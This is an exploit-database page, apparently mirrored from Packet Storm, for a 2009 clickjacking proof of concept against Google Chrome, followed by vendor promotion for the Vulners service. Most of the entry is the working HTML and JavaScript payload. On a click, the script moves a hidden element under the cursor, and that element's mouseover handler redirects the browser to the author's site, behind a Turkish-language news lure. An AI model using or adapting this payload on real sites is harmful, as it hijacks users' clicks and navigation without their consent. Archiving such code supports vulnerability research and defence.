Lucene search
K

Google Chrome ClickJacking

🗓️ 28 Jan 2009 00:00:00Reported by x0xType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Google Chrome Web Browser Clickjacking vulnerability at cyber-warrior.org by x0

Code
`#############################################################  
# Application Name : Google Chrome Web Browser  
# Vulnerable Type : Clickjacking  
# Home : www.cyber-warrior.org  
# Author : x0x  
#############################################################  
< ------------------- header data end of ------------------- >  
  
<html>  
<style type="text/css">  
<!--  
.style1 {  
font-size: 50px;  
font-weight: bold;  
}  
.style2 {  
color: #FF0000;  
font-weight: bold;  
font-size: 24px;  
}  
-->  
</style>  
<body>  
<span class="style2">x0x</span>  
<div class="style1" id="open"  
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"  
onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div>  
<p><strong>  
<script>  
function updatebox(evt) {  
mouseX=evt.pageX?evt.pageX:evt.clientX;  
mouseY=evt.pageY?evt.pageY:evt.clientY;  
document.getElementById('open').style.left=mouseX-2;  
document.getElementById('open').style.top=mouseY-2;  
}  
</script>  
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font  
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>  
<p><br>  
</p>  
</html>  
  
  
  
Greetz : All CW Users | All Muslims and OnLy Brother me UzMiX  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation